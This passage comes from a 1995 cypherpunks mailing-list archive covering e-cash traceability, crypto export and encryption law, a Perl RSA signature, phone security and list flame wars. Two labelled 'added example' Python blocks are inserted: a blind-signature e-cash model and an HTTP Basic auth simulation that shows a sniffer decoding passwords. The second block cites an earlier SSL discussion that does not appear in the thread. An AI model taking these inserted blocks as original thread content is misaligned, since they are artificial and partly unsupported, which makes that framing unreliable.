line up in favor of the idea.  But as I have explained it is not really
anonymous, no more so than any other payment system.  And it is not at
all clear that the kinds of anonymous accounts that would be necessary
to really make it anonymous will be allowed.  In that case, Microsoft
can just shrug and say, "well, we tried."  They get the best of both
worlds.  They make the government happy by providing a traceable
payment system, while they look good on the net by pushing "electronic
cash".

I don't have any proof that this is exactly what is going on.  But it is
possible, and I think we have to be skeptical and at least open to the
possibility that this kind of manipulation is occurring, no matter how
many assurances we get from the companies involved that they are really
on our side.  Finance is a high stakes business and there is a lot of
government regulation involved.  Where our interests and the government's
diverge, we need to watch closely to see whether the companies' actions
match their words.  This kind of marketing is going to continue to increase,
I expect.

Hal Finney
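
Added example, not part of the original post and not Microsoft's or Digicash's code: a Python model of the two withdrawal styles compared above. The unblinded bank records n = h(s) at withdrawal and can therefore link payer to payee at exchange; the blinding bank signs a value it cannot later match to the coin (s, SIGN(h(s))). The RSA key is a constructed toy (textbook RSA, no padding) and all class and function names are assumptions of this example.

```python
import hashlib
import math
import secrets


def h(s: bytes) -> int:
    """One-way function h(s), returned as an integer."""
    return int.from_bytes(hashlib.sha256(s).digest(), "big")


class UnblindedBank:
    """The scheme as described: the bank sees n = h(s) when it signs."""

    def __init__(self):
        self.valid = {}   # n -> account that withdrew the note
        self.links = []   # (withdrawing account, depositing payee)

    def withdraw(self, account: str, n: int) -> None:
        self.valid[n] = account

    def exchange(self, payee: str, s: bytes) -> bool:
        """Payee hands over the secret; the note dies on first use."""
        account = self.valid.pop(h(s), None)
        if account is None:
            return False              # unknown or already spent
        self.links.append((account, payee))
        return True


class BlindingBank:
    """Online blinded-coin contrast using a toy textbook RSA key."""

    P, Q, E = 2**61 - 1, 2**89 - 1, 65537   # constructed toy parameters

    def __init__(self):
        self.n = self.P * self.Q
        self._d = pow(self.E, -1, (self.P - 1) * (self.Q - 1))
        self.withdrawals = []   # (account, blinded value): all the bank sees
        self.spent = set()

    def sign_blinded(self, account: str, blinded: int) -> int:
        self.withdrawals.append((account, blinded))
        return pow(blinded, self._d, self.n)

    def deposit(self, s: bytes, sig: int) -> bool:
        """Coin is (s, SIGN(h(s))): check the signature, then double spending."""
        if pow(sig, self.E, self.n) != h(s) % self.n or s in self.spent:
            return False
        self.spent.add(s)
        return True


def withdraw_blinded(bank: BlindingBank, account: str):
    """Customer side: blind h(s), have it signed, remove the blinding factor."""
    s = secrets.token_bytes(16)
    while True:
        r = secrets.randbelow(bank.n - 2) + 2
        if math.gcd(r, bank.n) == 1:
            break
    blinded = h(s) * pow(r, bank.E, bank.n) % bank.n
    sig = bank.sign_blinded(account, blinded) * pow(r, -1, bank.n) % bank.n
    return s, sig


def demo():
    ub = UnblindedBank()
    s = secrets.token_bytes(16)
    ub.withdraw("alice", h(s))
    first, second = ub.exchange("shop", s), ub.exchange("shop", s)

    bb = BlindingBank()
    s2, sig = withdraw_blinded(bb, "alice")
    ok, again = bb.deposit(s2, sig), bb.deposit(s2, sig)
    bank_saw_coin = any(b == h(s2) % bb.n for _, b in bb.withdrawals)
    return first, second, ub.links, ok, again, bank_saw_coin


if __name__ == "__main__":
    print(demo())
```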




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Wed, 20 Dec 95 01:58:46 PST
To: alano@teleport.com (Alan Olsen)
Subject: Re: [even more NOISE] BIO-MUNITION: gifs of perl-RSA tattoo
Message-ID: <22479.9512200957@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Alan Olsen <alano@teleport.com> writes:
> [Much noise on Perl-RSA tattoo and compile problems deleted]
> 
> The only thought that came to mind on this thread was how closely
> the tattoo artist spellchecked that tattoo.  It would be pretty funny
> to have a "munitions violation" that was non-functional due to
> tattooing errors.

Funny you should say that... I thought I'd better check (before you
mentioned this btw) by transcribing from the (slightly grainy) gif,
and Richard did miss one char, fortunately in an easily correctable
position.  I'd guess his wife has probably tattooed the missing ` by
now.

(The ` was missing from the line:

$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa

but there was a bit of white space between the = and the e -- plenty
enough for a ` -- phew that was close!

While I'm here generating noise, someone just sent me this:

#!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-5-lines-PERL
do 'bigint.pl';($_,$n)=@ARGV;s/^.(..)*$/0$&/;($k=unpack('B*',pack('H*',$_)))=~
s/^0*//;$x=0;$z=$n=~s/./$x=&badd(&bmul($x,16),hex$&)/ge;while(read(STDIN,$_,$w
=((2*$d-1+$z)&~1)/2)){$r=1;$_=substr($_."\0"x$w,$c=0,$w);s/.|\n/$c=&badd(&bmul
($c,256),ord$&)/ge;$_=$k;s/./$r=&bmod(&bmul($r,$r),$x),$&?$r=&bmod(&bmul($r,$c
),$x):0,""/ge;($r,$t)=&bdiv($r,256),$_=pack(C,$t).$_ while$w--+1-2*$d;print}

Significance?  It's in pure perl -- no use of dc.  I was *very*
impressed.  It's a fair bit slower unfortunately, but some people
objected to the other one on the grounds that it was cheating to use
an external program (dc).  Also that will work on PCs without mods.

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@sware.com>
Date: Wed, 20 Dec 95 06:24:48 PST
To: karl@cosmos.cosmos.att.com (Karl A. Siil)
Subject: Re: (Fwd) SECURITY ALERT: Password protection bug in Netscape
In-Reply-To: <2.2b9.32.19951220115525.0069303c@cosmos.cosmos.att.com>
Message-ID: <199512201501.KAA28003@jafar.sware.com>
MIME-Version: 1.0
Content-Type: text/plain


Karl A. Siil writes:

> On a related note, how does Netscape (or HTTP in general) authenticate using
> the password? My best guess, without a sniffer, is (making up error codes as
> I go along, but you get the point):

> Anyway, lots of conjecture (sp?) here. Does anyone know how it really works
> or can point me at a reference? Thanks.

http://www.w3.org/hypertext/WWW/Protocols/HTTP1.0/draft-ietf-http-spec.html#AA


-- Jeff
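
Added example, not part of the original thread: a Python simulation of the HTTP/1.0 Basic scheme, answering the question quoted above. It shows the 401 / WWW-Authenticate challenge, the base64 Authorization reply that is resent on later requests to the same server, and a browser cache scoped to (server, realm) so one server's password is never offered to another. Host names, credentials and class names are constructed for the illustration.

```python
import base64
import re


def basic_header(user: str, password: str) -> str:
    """Authorization value: 'Basic ' + base64(user:password). Not encryption."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode("ascii")
    return "Basic " + token


def decode_basic(header: str):
    """What a sniffer on an unencrypted link recovers from a single request."""
    scheme, _, token = header.partition(" ")
    if scheme.lower() != "basic":
        return None
    user, _, password = base64.b64decode(token).decode().partition(":")
    return user, password


class Server:
    def __init__(self, host, realm, user, password):
        self.host, self.realm = host, realm
        self.expected = basic_header(user, password)
        self.seen = []   # every Authorization header this server received

    def handle(self, path, headers):
        auth = headers.get("Authorization")
        if auth is not None:
            self.seen.append(auth)
        if auth == self.expected:
            return 200, {}
        return 401, {"WWW-Authenticate": f'Basic realm="{self.realm}"'}


class Browser:
    def __init__(self, prompt):
        self.prompt = prompt   # callable(host, realm) -> (user, password)
        self.creds = {}        # (host, realm) -> Authorization value
        self.realm_of = {}     # host -> realm that last succeeded there
        self.prompts = 0

    def get(self, server, path):
        headers = {}
        realm = self.realm_of.get(server.host)
        if realm is not None:  # same server as before: send without a challenge
            headers["Authorization"] = self.creds[(server.host, realm)]
        status, reply = server.handle(path, headers)
        if status != 401:
            return status
        realm = re.search(r'realm="([^"]*)"', reply["WWW-Authenticate"]).group(1)
        key = (server.host, realm)
        cached = self.creds.get(key)
        if cached is None or cached == headers.get("Authorization"):
            self.prompts += 1  # nothing cached for this space, or it was rejected
            cached = basic_header(*self.prompt(server.host, realm))
        status, _ = server.handle(path, {"Authorization": cached})
        if status == 200:
            self.creds[key], self.realm_of[server.host] = cached, realm
        return status


def demo():
    # Constructed hosts and credentials; both servers use the same realm name.
    passwords = {"a.example": ("karl", "pw-for-A"),
                 "b.example": ("karl", "pw-for-B")}
    a = Server("a.example", "staff", *passwords["a.example"])
    b = Server("b.example", "staff", *passwords["b.example"])
    browser = Browser(lambda host, realm: passwords[host])
    statuses = [browser.get(a, "/one"), browser.get(a, "/two"),
                browser.get(b, "/three")]
    return statuses, browser.prompts, a, b


if __name__ == "__main__":
    statuses, prompts, a, b = demo()
    print(statuses, "prompts:", prompts)
    print("sniffed from server A traffic:", decode_basic(a.seen[0]))
```

Because the credentials ride on every request in a reversible encoding, the only protection on the wire is the transport, which is the reason given earlier in the thread for collecting passwords over SSL.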



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Wed, 20 Dec 95 08:11:18 PST
To: cypherpunks@toad.com
Subject: Re: Which countries don't allow encryption ?
In-Reply-To: <9512201335.AA01573@imdwd01>
Message-ID: <75ZegD4w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


visentin@imdwd01.milano.italtel.it writes:
> I'm trying to address the following issue: people at
> my company need to exchange sensitive information with
> their colleagues abroad (e.g. East Europe, or Southern
> America).
...
> I read somewhere that Russian law forbids the use of
> encryption: is this correct ?

More or less. President Yeltsin's edict of April 3, 1995, prohibits the
use of encryption without a licence from FAPSI. I've been told that
"everybody" continues to use PGP and no one's had any trouble yet.
However in today's climate I can imagine a Western business blatantly
violating the edict, being threatened with prosecution, and being shaken
down for a bribe... For peace of mind, why don't your correspondents
go to FAPSI and simply ask for a licence? They're nice people.

You might have more of a problem in France, where, as far as I know, you
must deposit your cryptographic keys with the government, so it may read
your correspondence. Soon this may be required in the U.S. as well.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Tue, 19 Dec 95 16:27:58 PST
To: tcmay@got.net (Timothy C. May)
Subject: Re: What ever happened to... Cray Comp/NSA co-development
In-Reply-To: <acfa2f2812021004d314@[205.199.118.202]>
Message-ID: <199512200022.LAA28002@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello,

tcmay wrote:
...
> Prime Factoring? Primes are easy to factor, of course. (Hint: Every prime
> has two factors.)
...

Can someone enlighten me as to what the two factors are?

With sensible definitions I've heard you either get one (just itself)
or four (itself [p], both units [1,-1] and the co-whatsitsname [-p]).

(Sorry to pick on tcmay, but usually when you factorise a number you
*never* put in a "1*", for example:
  6 = 2*3
  9 = 3*3*3
and
  7 = 7
not
  7 = 1*7
, so I suspect the usual statement would be "Every prime has one factor.".)


Or am I totally clueless?

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Light Ray <fricke@mae.engr.ucdavis.edu>
Date: Wed, 20 Dec 95 11:40:53 PST
To: jirib@cs.monash.edu.au
Subject: Re: What ever happened to... Cray Comp/NSA co-development
In-Reply-To: <199512200022.LAA28002@sweeney.cs.monash.edu.au>
Message-ID: <Pine.HPP.3.91.951220114130.20443B-100000@roboben.engr.ucdavis.edu>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 20 Dec 1995, Jiri Baum wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Hello,
> 
> tcmay wrote:
> ...
> > Prime Factoring? Primes are easy to factor, of course. (Hint: Every prime
> > has two factors.)

> ...
> 
> Can someone enlighten me as to what the two factors are?
> 

The two factors of a prime number are itself and one.  However, prime 
factoring usually refers to (?) factoring a number out into its 
component prime numbers.

Tobin Fricke




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 20 Dec 95 09:37:17 PST
To: cypherpunks@toad.com
Subject: KOD
Message-ID: <199512201737.MAA29878@pipe6.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Congratulations to the cypherpunks named Newsweek's "Big 
Thinkers of tomorrow -- the list of 50 People Who Matter Most 
on the Internet." In the December 25 issue.


And, sympathy for the Kiss of Death envynescent celebrity.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Wed, 20 Dec 95 12:22:01 PST
To: Alex de Joode <usura@berserk.com>
Subject: Re: CFS and Linux
In-Reply-To: <199512201915.UAA00215@asylum.berserk.com>
Message-ID: <Pine.LNX.3.91.951220124114.4924A-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Dec 1995, Alex de Joode wrote:

> Date: Wed, 20 Dec 1995 20:15:14 +0100 (MET)
> From: Alex de Joode <usura@berserk.com>
> To: cypherpunks@toad.com
> Subject: CFS and Linux
> 
> 
> Is there anyone out there that has CFS running with Linux ?
> 
> It installs fine on BSDi 2.0 but I'm unable to install it 
> under Linux, I would appreciate it if some one would help
> me out.


i don't think i can help you at all but i do have it running on my linux 
box.  i compiled it as ELF with gcc 2.7.0 and libc 5.0.9.  unfortunately, 
i just tried to compile it again and it didn't work.  i'm not sure what 
i've changed since then but i have updated some libraries and bin-utils 
so who knows.

anyway, i know other people have it running too, it just seems really 
touchy to me.

sorry for the lack of info/help,

-pjf

patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER zinc-pgp@zifi.genetics.utah.edu for pgp public key - CRYPTO!
zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 20 Dec 95 13:47:54 PST
To: cypherpunks@toad.com
Subject: Re: Political Cleanup program [NOISE]
Message-ID: <199512202147.NAA00522@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


Phill <hallam@w3.org> wrote:
>>It is not simply an issue of money, it is an issue of national security. If a 
>>foreigner were to control the majority of the media there would be a significant 
>>threat to the national interest. This threat has been realised in the UK with 
>>the coming to power of Rupert Murdoch. Fortunately his influence on the US 
>>political scene has thus far been minor. In his own country he has brought down 
>>the government more than once.

At 01:37 AM 12/20/95 -0500, Jim Ray wrote:
>So what??? He gives us "The Simpsons" and "Married, With Children!"
>[IMO] Rupert has done more for humor than any humor-impaired liberal
>has ever done!

Murdoch is bitterly hated by our elites, because things are speakable on
his networks that are unspeakable on other networks.

Hence their perfectly true claim that he has overthrown several 
governments.

I hope he overthrows some more.

I especially love the political humor on "married with children"

Cypherpunk relevance:  Murdoch got in deep shit because of his famous
speech that the communication revolution would profoundly undermine
the power of oppressive governments.

Murdoch sometimes calls himself a libertarian, but he is more a conservative
with bombs.  Still, I am strongly in favor of bombs.   It seems clear to
me that Murdoch, whatever his political beliefs may be, has done much
for liberty.  He has been a powerful disruptive influence.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Wed, 20 Dec 95 11:37:37 PST
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: revised time quantization package (Unix & WIN32) available
In-Reply-To: <199512201858.NAA28293@jekyll.piermont.com>
Message-ID: <Pine.OSF.3.91.951220133424.7053C-100000@abernathy.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain



Perry,

the only crypto code you seem to do is the unintelligible postings
that you send to the list.

.d

On Wed, 20 Dec 1995, Perry E. Metzger wrote:

> 
> Dan Harmon writes:
> > If this is what you consider contributing then you seem to have some
> > deep problems that cannot be solved here. You may have to seek professional 
> > help. Your continued and at times seemingly uncontrollable use of vulgar 
> > language may indicate a neurobiological disorder such as Tourette's 
> > syndrome.  You really should have it checked out before you harm yourself 
> > and possibly others.
> 
> Thank you for the pseudopsychology, but really, all you've done is
> further confirm my diagnosis of "non-contributing asshole".
> 
> When was the last time you did anything to actually help spread
> cryptography, eh?
> 
> If you'll pardon me, I have crypto code to get back to.
> 
> .pm
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Wed, 20 Dec 95 13:46:32 PST
To: cypherpunks@toad.com
Subject: Text version of Cyphernomicon
Message-ID: <199512202145.NAA05944@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

ftp.goblin.punk.net/pub/docs/cypherfq.zip  or   cypherpunk.faq.gz
- -- 
Jeff Simmons                           jsimmons@goblin.punk.net

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Pettitt <jpp@software.net>
Date: Wed, 20 Dec 95 14:19:36 PST
To: cypherpunks@toad.com
Subject: 900mhz digital phones - how much to trust ?
Message-ID: <199512202219.OAA26567@software.net>
MIME-Version: 1.0
Content-Type: text/plain



What's the current thinking on the security level of 900Mhz digital spread
spectrum cordless phones? Clearly it's not a basic scanner job but how much
more equipment is needed to monitor one ?
John Pettitt, jpp@software.net
VP Engineering, CyberSource Corporation, 415 473 3065

Favorite quote: "Security is mostly a superstition. It does not 
exist in nature, nor do the children of man as a whole experience
it. Avoiding danger is no safer in the long run than outright
exposure. Life is either a daring adventure, or nothing." -  Helen Keller





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Karl A. Siil" <karl@cosmos.cosmos.att.com>
Date: Wed, 20 Dec 95 11:34:36 PST
To: cypherpunks@toad.com
Subject: Re: revised time quantization package (Unix & WIN32) available
Message-ID: <2.2b9.32.19951220193213.006bd414@cosmos.cosmos.att.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:14 AM 12/20/95 EST, Dr. Dimitri Vulis wrote:
...
>> Matt, if you're getting paid to read this list, I want a new contract.
>
>Karl, are you an unpaid volunteer at AT&T, or do you quit your job every
>time you read your e-mail?

Actually, AT&T has us record our time down to 15 minute intervals, which I
obey religiously*. In this case, I'm writing my CP activity off to "People
who can't see a joke without a :-)."

* Note there should be a :-) here, too.

Not speaking for the company...

					Karl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: visentin@imdwd01.milano.italtel.it
Date: Wed, 20 Dec 95 05:35:17 PST
To: cypherpunks@toad.com
Subject: Which countries don't allow encryption ?
Message-ID: <9512201335.AA01573@imdwd01>
MIME-Version: 1.0
Content-Type: text/plain


Hi all,

Apologies in advance if anyone feels this is off topic...

I'm trying to address the following issue: people at
my company need to exchange sensitive information with
their colleagues abroad (e.g. East Europe, or Southern
America).

Of course, the most obvious way to protect our data
is to encrypt everything, regardless of how we communicate
(either via e-mail or sending magnetic media).
So we should use PGPi, but...it seems to me there
is a _problem_.

I read somewhere that Russian law forbids the use of
encryption: is this correct ?

Let me generalize this first question: which countries
in the world don't allow encryption usage, or encrypted
traffic inside their boundaries ?  or allow, but provided
certain conditions are satisfied ?

2nd question: which way(s) could we meet the laws in, let
me say, East Europe while protecting our info ?
(I'd like to avoid giving away our keys, as I'd requested
-possibly- in France, so maybe encryption is not suitable).

Please e-mail directly to me, since I'm not a subscriber
of this list (I tried it, but it is a too high volume and
specialization level for me).

Thanks in advance,

Franco Visentin
( visentin@milano.italtel.it )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 20 Dec 95 14:56:58 PST
To: dmandl@bear.com (David Mandl)
Subject: Re: KOD
In-Reply-To: <Pine.SUN.3.91.951220160232.4338q-100000@goya>
Message-ID: <199512202251.OAA27128@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	Rumor has it that I was listed there ...
I haven't seen it though.

> 
> On Wed, 20 Dec 1995, John Young wrote:
> 
> > Congratulations to the cypherpunks named Newsweek's "Big 
> > Thinkers of tomorrow -- the list of 50 People Who Matter Most 
> > on the Internet." In the December 25 issue.
> 
> Can you reveal who they are?  No way am I going to buy Newsweek to
> find out.
> 
>    --Dave.
> 
> --
> David Mandl
> Bear, Stearns & Co. Inc.
> Phone: (212) 272-3888
> Email: dmandl@bear.com
> 
> --
> *******************************************************************************
> Bear Stearns is not responsible for any recommendation, solicitation, offer or
> agreement or any information about any transaction, customer account or account
> activity contained in this communication.
> *******************************************************************************
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Rose <mrose@stsci.edu>
Date: Wed, 20 Dec 95 11:52:20 PST
To: dan@milliways.org
Subject: Re: Motorola Secure Phone
Message-ID: <9512201951.AA25492@MARIAN.SOGS.STSCI.EDU>
MIME-Version: 1.0
Content-Type: text/plain



>I saw a new cordless phone made by Motorola in a retail outlet today
>that is supposedly "Secure from eavesdroppers."  I asked the
>salespeople for more technical info, but they weren't very helpful. 
>Does anyone have any information on this?

I have one of these, it's a good phone.  I think the security will
stop only an off-the-shelf scanner.  My understanding is that the
signal is not encrypted, but only phase-inverted or otherwise shifted.

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Wed, 20 Dec 95 15:03:30 PST
To: cypherpunks@toad.com
Subject: Please cut the "tude"!
Message-ID: <199512202303.PAA02038@ohio.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain


The "tude" level is getting a bit out of hand.

Please take your personal attacks elsewhere.

Moderator, please beat them silly with a banana
until they stop!

Thanks!

Ern




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bert-Jaap Koops" <E.J.Koops@kub.nl>
Date: Wed, 20 Dec 95 06:16:23 PST
To: cypherpunks@toad.com
Subject: Re: Which countries don't allow encryption ?
Message-ID: <1DBA4168EA@frw3.kub.nl>
MIME-Version: 1.0
Content-Type: text/plain


> Let me generalize this first question: which countries
> in the world don't allow encryption usage, or encrypted
> traffic inside their boundaries ?  or allow, but provided
> certain conditions are satisfied ?

See my Crypto Law Survey.

NOTE: the URL has changed. Please reset your pointers to:

http://cwis.kub.nl/~frw/CRI/projects/bjk/lawsurvy.html

I shall update it in the first week of January and provide some more 
pointers to online information.

Regards,
Bert-Jaap

----------------------------------------------------------------------
Bert-Jaap Koops                         tel     +31 13 466 8101
Center for Law and Informatization      facs    +31 13 466 8102
Tilburg University                      e-mail  E.J.Koops@kub.nl
                  --------------------------------------------------
Postbus 90153    |  This world's just mad enough to have been made  |
5000 LE Tilburg  |    by the Being his beings into being prayed.    |
The Netherlands  |                (Howard Nemerov)                  |
---------------------------------------------------------------------
         http://www.kub.nl:2080/FRW/CRI/people/bertjaap.htm
---------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 20 Dec 95 12:27:31 PST
To: Dan Harmon <harmon@tenet.edu>
Subject: Re: revised time quantization package (Unix & WIN32) available
In-Reply-To: <Pine.OSF.3.91.951220141503.17633B-100000@beall.tenet.edu>
Message-ID: <199512202027.PAA28498@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Dan Harmon writes:
> Perry, If my memory is correct, you are the one who has a history of being
> a jerk.

You know, Mr. Harmon, you can just keep posting my private mail to you
all day, but you WILL start to annoy others after a while.

[Just to be clear to others, this is the first of the several messages
on the topic I've posted -- Mr. Harmon has been forwarding my private
replies to the list. I think it all makes him look bad, but some
people have no sense.]

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Paul Johnson <mpj@netcom.com>
Date: Wed, 20 Dec 95 15:48:44 PST
To: cypherpunks@toad.com
Subject: Ruby Block Cipher
Message-ID: <Pine.SUN.3.91.951220154441.5757B-100000@netcom4>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----



The Ruby Block Cipher has just been published.  It is not a general block
cipher in that it cannot be used in Electronic Codebook (ECB) mode.  It is
more like a cryptographic hash function with a block size of only 64 bits. Of
course, 64 bits is too short for a cryptographic hash function intended for
digital signature use, but it is just fine for a quick block cipher.

This may be a good reference for those folks who want a quick & easy
encryption algorithm that need not withstand nuclear attack but can provide
something better than common weak encryption methods in use in the software
industry.

Your comments and suggestions on this rather strange little cipher are
welcome.

Information on the Ruby Block Cipher is available as

ftp://ftp.csn.net/mpj/public/ruby_m4.ps

and, if you are in the USA or Canada, a reference implementation is in

ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/mpj/rubycode.zip
where the ??????? is revealed in
ftp://ftp.csn.net/mpj/README

rubycode.zip is also available on the Colorado Catacombs BBS at 303-772-1062.

Note: this is not a product for sale (it is free and probably worth at least
as much as you pay for it).  It is also not a prepublication (it is THE
publication in electronic form with no paper publication anticpated in the
near future).

                  ___________________________________________________________
                 |                                                           |
 |\  /| |        | Michael Paul Johnson  Colorado Catacombs BBS 303-772-1062 |
 | \/ |o|        | PO Box 1151, Longmont CO 80502-1151 USA   Jesus is alive! |
 |    | | /  _   | mpj@csn.net aka mpj@netcom.com m.p.johnson@ieee.org       |
 |    |||/  /_\  | ftp://ftp.csn.net/mpj/README.MPJ          CIS: 71331,2332 |
 |    |||\  (    | http://www.csn.net/~mpj                 -. --- ----- .... |
 |    ||| \ \_/  | PGPprint=F2 5E A1 C1 A6 CF EF 71  12 1F 91 92 6A ED AE A9 |
                 |___________________________________________________________|


-----BEGIN PGP SIGNATURE-----
Version: 2.7.1

iQCVAgUBMNiaP/X0zg8FAL9FAQHe0AP+N+tBxoaIdny3CEgxdA8LO9+5VyYiOety
qYBc9aCrCbw4TpsFTcsg5bosPlkm3H+VwpWVGOshfl5p69J893jrma07xRamEvM0
/1Mro3X/Ga4SQ7rjHPSdPCBR3YxSA7UoIx27gldTBty2k8WAAeH0BTbn/5s1bGrf
ej9ab/rd7Jc=
=QRjc
-----END PGP SIGNATURE-----
P. S. -- I don't normally read this list, so please send a copy of 
follow-ups directly to me.  Thanks!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mandl <dmandl@bear.com>
Date: Wed, 20 Dec 95 13:05:11 PST
To: John Young <jya@pipeline.com>
Subject: Re: KOD
In-Reply-To: <199512201737.MAA29878@pipe6.nyc.pipeline.com>
Message-ID: <Pine.SUN.3.91.951220160232.4338q-100000@goya>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Dec 1995, John Young wrote:

> Congratulations to the cypherpunks named Newsweek's "Big 
> Thinkers of tomorrow -- the list of 50 People Who Matter Most 
> on the Internet." In the December 25 issue.

Can you reveal who they are?  No way am I going to buy Newsweek to
find out.

   --Dave.

--
David Mandl
Bear, Stearns & Co. Inc.
Phone: (212) 272-3888
Email: dmandl@bear.com

--
*******************************************************************************
Bear Stearns is not responsible for any recommendation, solicitation, offer or
agreement or any information about any transaction, customer account or account
activity contained in this communication.
*******************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 20 Dec 95 13:18:16 PST
To: cypherpunks@toad.com
Subject: Re: The Problem With Blaze And Weinstein
In-Reply-To: <199512202018.UAA02824@pangaea.ang.ecafe.org>
Message-ID: <199512202117.QAA28656@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



ECafe Anonymous Remailer writes:
> I'm not trying to start a flame war.

Really?

> They aren't cypherpunks.
> 
> Neither has come out against GAK.

You obviously have never spoken to Matt.

> Blaze even does "research" on GAK.

No, he does research on private escrow. That's not the same thing as
GAK. Private escrow is sensible -- you don't want just one person with
the keys to, say, the personnel records. What happens if they get hit
by a car?

> DO THEY HAVE YOU ALL SO IMPRESSED WITH THEIR MASTERS DEGREES THAT
> YOUR AFRAID TO LOOK CLOSELY?

Actually, Matt has a Ph.D. from Princeton.

> WHY IS EVERYONE SO QUICK TO DEFEND THESE PEOPLE?

Maybe I defend Matt because I think I know him pretty well -- we met
when he showed up at the Columbia U. computer science department in
the mid 1980s, and among other things we shared an office at Bellcore
for a year or two, and he's about as cryptography and privacy friendly
a person as you can find.

Maybe I defend him because you are likely an idiot who's never so much
as chatted with him.

Maybe I'm bored.

Who knows.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bert-Jaap Koops" <E.J.Koops@kub.nl>
Date: Wed, 20 Dec 95 07:53:44 PST
To: cypherpunks@toad.com
Subject: Correct URL Crypto Law Survey
Message-ID: <1F59210729@frw3.kub.nl>
MIME-Version: 1.0
Content-Type: text/plain


>http://cwis.kub.nl/~frw/CRI/projects/bjk/lawsurvy.html
 
Sorry, the URL should be: 

http://cwis.kub.nl/~frw/CRI/projects/bjk/lawsurvy.htm

Bert-Jaap.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robbie Gates <gates_r@maths.su.oz.au>
Date: Tue, 19 Dec 95 22:10:10 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: Bit Commitment Query
Message-ID: <30D7A993.3F54@maths.su.oz.au>
MIME-Version: 1.0
Content-Type: text/plain


